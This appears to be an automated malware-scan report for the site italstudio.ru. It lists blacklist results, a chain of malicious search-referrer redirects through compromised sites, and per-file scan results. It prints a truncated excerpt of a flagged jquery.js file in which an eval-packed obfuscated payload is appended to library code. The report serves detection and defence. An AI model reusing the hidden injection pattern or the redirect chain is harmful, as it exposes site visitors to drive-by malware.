Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=italstudio.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://italstudio.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://italstudio.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: italstudio.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Tue, 24 Jun 2014 00:27:07 GMT Location: http://alfsystem.com.my/includes/domit/1.php Server: nginx Content-Length: 0 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.3.27 | malicious |
URL: http://alfsystem.com.my/includes/domit/1.php (imitation of visitor from search engine) GET /includes/domit/1.php HTTP/1.1 Host: alfsystem.com.my Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Tue, 24 Jun 2014 00:30:07 GMT Location: http://www.csra.de/includes/domit/1.php Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.23 | malicious |
URL: http://www.csra.de/includes/domit/1.php (imitation of visitor from search engine) GET /includes/domit/1.php HTTP/1.1 Host: www.csra.de Referer: http://www.google.com/search?q=redirect+check3 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Tue, 24 Jun 2014 00:30:07 GMT Location: http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.4.29 | malicious |
URL: http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php (imitation of visitor from search engine) GET /components/com_user/views/login/tmpl/1/all3.php HTTP/1.1 Host: jbtconsultinggroup.com Referer: http://www.google.com/search?q=redirect+check4 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Tue, 24 Jun 2014 00:30:08 GMT Location: http://google.ru Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html | malicious |
Scanned pages/files
Request | Server response | Status |
http://italstudio.ru/ | 200 OK Content-Length: 87089 Content-Type: text/html | clean |
http://italstudio.ru/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/x-javascript | clean |
http://italstudio.ru/plugins/system/rokbox/rokbox.js | 200 OK Content-Length: 22076 Content-Type: application/x-javascript | clean |
http://italstudio.ru/plugins/system/rokbox/themes/light/rokbox-config.js | 200 OK Content-Length: 2598 Content-Type: application/x-javascript | clean |
http://italstudio.ru/templates/mebel/js/rokutils.js | 200 OK Content-Length: 2616 Content-Type: application/x-javascript | clean |
http://italstudio.ru/templates/mebel/js/rokutils.inputs.js | 200 OK Content-Length: 2491 Content-Type: application/x-javascript | clean |
http://italstudio.ru/templates/mebel/js/rokmoomenu.js | 200 OK Content-Length: 5100 Content-Type: application/x-javascript | clean |
http://italstudio.ru/templates/mebel/js/mootools.bgiframe.js | 200 OK Content-Length: 964 Content-Type: application/x-javascript | clean |
http://italstudio.ru/modules/mod_vm_accordion/script/script.js | 200 OK Content-Length: 1582 Content-Type: application/x-javascript | clean |
http://italstudio.ru/modules/mod_nivoslider/assets/jquery.js | 200 OK Content-Length: 79056 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
(function(E,A){function U(){return false}function ba(){return true}function ja(a,b,d){d[0].type=a;return c.event.handle.apply(b,d)}function Ga(a){var b,d,e=[],f=[],h,k,l,n,s,v,B,D;k=c.data(this,this.nodeType?"events":"__events__");if(typeof k==="function")k=k.events;if(!(a.liveFired===this||!k||!k.live||a.button&&a.type==="click")){if(a.namespace)D=RegExp("(^|\\.)"+a.namespace.split(".").join("\\.(?:.*\\.)?")+"(\\.|$)");a.liveFired=this;var H=k.live.slice(0);for(n=0;n<H.length;n++){k= ; eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('5 3=4.7("3");3.p=10;3.q=10;3.r="s: t;";5 c="u:
Antivirus reports:
http://italstudio.ru/modules/mod_nivoslider/assets/jquery.nivo.slider.js | 200 OK Content-Length: 9716 Content-Type: application/x-javascript | clean |
http://italstudio.ru/modules/mod_swmenupro/jquery-1.2.6.pack.js | 200 OK Content-Length: 31033 Content-Type: application/x-javascript | clean |
http://italstudio.ru/modules/mod_swmenupro/hoverIntent.js | 200 OK Content-Length: 3174 Content-Type: application/x-javascript | clean |
http://italstudio.ru/modules/mod_swmenupro/superfish.js | 200 OK Content-Length: 3714 Content-Type: application/x-javascript | clean |
http://italstudio.ru/modules/mod_swmenupro/supersubs.js | 200 OK Content-Length: 3298 Content-Type: application/x-javascript | clean |